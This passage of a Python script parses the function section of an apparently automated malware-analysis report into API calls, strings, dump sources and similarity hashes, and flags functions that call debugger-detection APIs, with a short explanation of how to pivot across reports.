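    r"([A-Za-z_]\w*)\.([A-Za-z0-9_]+)(?:\((.*)\))?,? ref: ([0-9A-F]+)$"
)


def parse_entries(text):
    """Return one dict per function entry: apis, strings, dump_sources, similarity."""
    entries, entry, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":  # every entry starts with its APIs heading
            entry = {"apis": [], "strings": [], "dump_sources": [], "similarity": {}}
            entries.append(entry)
            section = line
            continue
        if entry is None:
            continue
        if line in HEADINGS:
            section = line
            continue
        item = line[1:].strip() if line.startswith("•") else line
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                entry["apis"].append({
                    "subcall_of": m.group(1),  # None when called directly
                    "name": m.group(2), "module": m.group(3),
                    "args": m.group(4).split(",") if m.group(4) else [],
                    "ref": m.group(5),
                })
        elif section == "Strings":
            s, sep, xref = item.rpartition(", xrefs: ")
            entry["strings"].append((s, xref) if sep else (item, None))
        elif section == "Memory Dump Source":
            key, _, value = item.partition(": ")
            entry["dump_sources"].append((key, value.removesuffix("Download File")))
        else:  # IDA Plugin and Similarity fields are both "Key: value"
            key, _, value = item.partition(": ")
            entry["similarity"][key] = value
    return entries


def index_by(entries, field):
    """Group entries by one Similarity field, e.g. 'API String ID' or 'Instruction Fuzzy Hash'."""
    idx = defaultdict(list)
    for e in entries:
        if e["similarity"].get(field):
            idx[e["similarity"][field]].append(e)
    return dict(idx)


def calls_api(entry, name, include_subcalls=False):
    return any(a["name"] == name and (include_subcalls or a["subcall_of"] is None)
               for a in entry["apis"])


def anti_debug_entries(entries, names=("IsDebuggerPresent", "OutputDebugStringW")):
    """Entries that call a debugger-detection API directly (not only via a subcall)."""
    return [e for e in entries if any(calls_api(e, n) for n in names)]


if __name__ == "__main__":
    for e in parse_entries(SAMPLE_REPORT):
        print(e["similarity"]["API String ID"], [a["name"] for a in e["apis"]])
```

Feed the parser the plain-text export of the whole function section; `index_by(entries, "Instruction Fuzzy Hash")` then gives the same pivot across several reports that the Similarity block is meant for, and `anti_debug_entries` isolates the functions whose signatures back the "Contains functionality to check if a debugger is running" verdicts listed at the top of the report.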